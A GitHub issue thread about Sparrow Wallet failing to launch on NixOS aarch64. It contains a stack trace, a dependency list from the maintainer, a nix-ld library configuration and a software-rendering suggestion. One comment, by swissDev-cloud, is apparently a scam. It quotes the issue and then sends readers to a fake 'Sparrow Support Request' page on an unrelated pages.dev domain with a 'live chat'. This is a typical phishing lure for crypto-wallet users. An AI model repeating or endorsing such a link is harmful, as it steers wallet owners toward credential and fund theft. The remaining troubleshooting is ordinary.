### ISSUE TITLE
Sparrow doesn’t start on nixOS (aarch64)

### ISSUE THREAD

**Issue by theprivacydesigner** [sparrowwallet/sparrow#1554]
I’m trying to run Sparrow on nixOS aarch64.
I’m getting this crash as soon as I launch Sparrow, though:
> MESA: error: ZINK: failed to choose pdev
glx: failed to create drisw screen
No display detected. Use Sparrow Server on a headless (no display) system.

> 2024-12-05 22:48:17,533 ERROR [main] c.s.s.SparrowWallet [null:-1] Unable to launch application
java.lang.UnsupportedOperationException: Unable to load glass GTK library.
	at javafx.graphics@22/com.sun.glass.ui.gtk.GtkApplication.lambda$new$5(Unknown Source)
	at java.base/java.security.AccessController.doPrivileged(Unknown Source)
	at javafx.graphics@22/com.sun.glass.ui.gtk.GtkApplication.<init>(Unknown Source)
	at javafx.graphics@22/com.sun.glass.ui.gtk.GtkPlatformFactory.createApplication(Unknown Source)
	at javafx.graphics@22/com.sun.glass.ui.Application.run(Unknown Source)
	at javafx.graphics@22/com.sun.javafx.tk.quantum.QuantumToolkit.startup(Unknown Source)
	at javafx.graphics@22/com.sun.javafx.application.PlatformImpl.startup(Unknown Source)
	at javafx.graphics@22/com.sun.javafx.application.PlatformImpl.startup(Unknown Source)
	at javafx.graphics@22/com.sun.javafx.application.LauncherImpl.startToolkit(Unknown Source)
	at javafx.graphics@22/com.sun.javafx.application.LauncherImpl.launchApplication1(Unknown Source)
	at javafx.graphics@22/com.sun.javafx.application.LauncherImpl.lambda$launchApplication$2(Unknown Source)
	at java.base/java.lang.Thread.run(Unknown Source)

**System**
- Sparrow Wallet 2.0.0
- nixOS 24.05.6668

**Details**
NixOS offers a Sparrow package but it _isn’t_ compatible with aarch64.
This means it’s necessary to rely on the generic Sparrow binary and [nix-ld](https://nix.dev/guides/faq#how-to-run-non-nix-executables).
NixOS cannot run dynamically linked executables and requires instead to create a library path that only applies to Sparrow.
The difficult part is listing out all the libraries Sparrow might need.
So far I have:
- xorg.libX11
- libGL
- gtk4

Could you please help me figure out which other libraries Sparrow relies on?

**Comment by swissDev-cloud** [comment]
> I’m trying to run Sparrow on nixOS aarch64. I’m getting this crash as soon as I launch Sparrow, though:
> 
> > MESA: error: ZINK: failed to choose pdev
> > glx: failed to create drisw screen
> > No display detected. Use Sparrow Server on a headless (no display) system.
> 
> > 2024-12-05 22:48:17,533 ERROR [main] c.s.s.SparrowWallet [null:-1] Unable to launch application
> > java.lang.UnsupportedOperationException: Unable to load glass GTK library.
> > at javafx.graphics@22/com.sun.glass.ui.gtk.GtkApplication.lambda$new$5(Unknown Source)
> > at java.base/java.security.AccessController.doPrivileged(Unknown Source)
> > at javafx.graphics@22/com.sun.glass.ui.gtk.GtkApplication.(Unknown Source)
> > at javafx.graphics@22/com.sun.glass.ui.gtk.GtkPlatformFactory.createApplication(Unknown Source)
> > at javafx.graphics@22/com.sun.glass.ui.Application.run(Unknown Source)
> > at javafx.graphics@22/com.sun.javafx.tk.quantum.QuantumToolkit.startup(Unknown Source)
> > at javafx.graphics@22/com.sun.javafx.application.PlatformImpl.startup(Unknown Source)
> > at javafx.graphics@22/com.sun.javafx.application.PlatformImpl.startup(Unknown Source)
> > at javafx.graphics@22/com.sun.javafx.application.LauncherImpl.startToolkit(Unknown Source)
> > at javafx.graphics@22/com.sun.javafx.application.LauncherImpl.launchApplication1(Unknown Source)
> > at javafx.graphics@22/com.sun.javafx.application.LauncherImpl.lambda$launchApplication$2(Unknown Source)
> > at java.base/java.lang.Thread.run(Unknown Source)
> 
> **System**
> 
> * Sparrow Wallet 2.0.0
> * nixOS 24.05.6668
> 
> **Details** NixOS offers a Sparrow package but it _isn’t_ compatible with aarch64. This means it’s necessary to rely on the generic Sparrow binary and [nix-ld](https://nix.dev/guides/faq#how-to-run-non-nix-executables). NixOS cannot run dynamically linked executables and requires instead to create a library path that only applies to Sparrow. The difficult part is listing out all the libraries Sparrow might need. So far I have:
> 
> * xorg.libX11
> * libGL
> * gtk4
> 
> Could you please help me figure out which other libraries Sparrow relies on?

We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Sparrow Support Request](https://dapprectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by craigraw** [comment]
Here are the dependencies listed in the .deb control file:
```
Depends: libasound2, libbsd0, libc6, libx11-6, libxau6, libxcb1, libxdmcp6, libxext6, libxi6, libxrender1, libxtst6, xdg-utils 
```

Probably, not all of these are actually used, but I haven't tried reducing the set yet as they seem fairly standard.

For the error you encountered, it may be worth prioritising software over hardware rendering with
```
_JAVA_OPTIONS=-Dprism.order=sw /opt/sparrow/bin/Sparrow
```

**Comment by theprivacydesigner** [comment]
Thank you, Craig.
Let me try and report back.

**Comment by craigraw** [comment]
Any feedback?

**Comment by theprivacydesigner** [comment]
Here’s where I’m at — for each library listed in the .deb I found the corresponding library in nixOS.

```
libasound2: alsa-lib
libbsd0: libbsd
libc6: glibc
libx11-6: xorg.libX11
libxau6: xorg.libXau
libxcb1: xorg.libxcb 
libxdmcp6: xorg.libXdmcp
libxext6: xorg.libXext
libxi6: xorg.libXi
libxrender1: xorg.libXrender
libxtst6: xorg.libXtst
xdg-utils: xdg-utils
```

Which I’ve then listed in my configuration.nix
```
...
# nix-ld
  programs.nix-ld.enable = true;
  programs.nix-ld.libraries = with pkgs; [
    glibc
    xorg.libX11
    libGL
    gtk4
    pkg-config
    xdg-utils
    xorg.libXtst
    xorg.libXrender
    libextractor
    xorg.libXdmcp
    libbsd
    alsa-lib
    xorg.libXau
    xorg.libxcb
    xorg.libXext
    xorg.libXi
  ];
...
```

I can get Sparrow to tell me its version or print the help (`./Sparrow -v` and `./Sparrow -h`).

When I try to launch it, though, I still get this error (`./Sparrow -t` gives the same error):

```
MESA: error: ZINK: failed to choose pdev
glx: failed to create drisw screen
No display detected. Use Sparrow Server on a headless (no display) system.
```

I’m unsure of what I’m doing wrong.
Please do let me know if you have any thoughts on what might be going wrong.

**Comment by craigraw** [comment]
Did you try prioritising software rendering as per my earlier post?

**Comment by theprivacydesigner** [comment]
Apologies for not trying earlier. I just did and I get this:
```
$ _JAVA_OPTIONS=-Dprism.order=sw ./Sparrow
Picked up _JAVA_OPTIONS: -Dprism.order=sw
No display detected. Use Sparrow Server on a headless (no display) system.
```

**Comment by craigraw** [comment]
See also https://github.com/sparrowwallet/sparrow/pull/1648
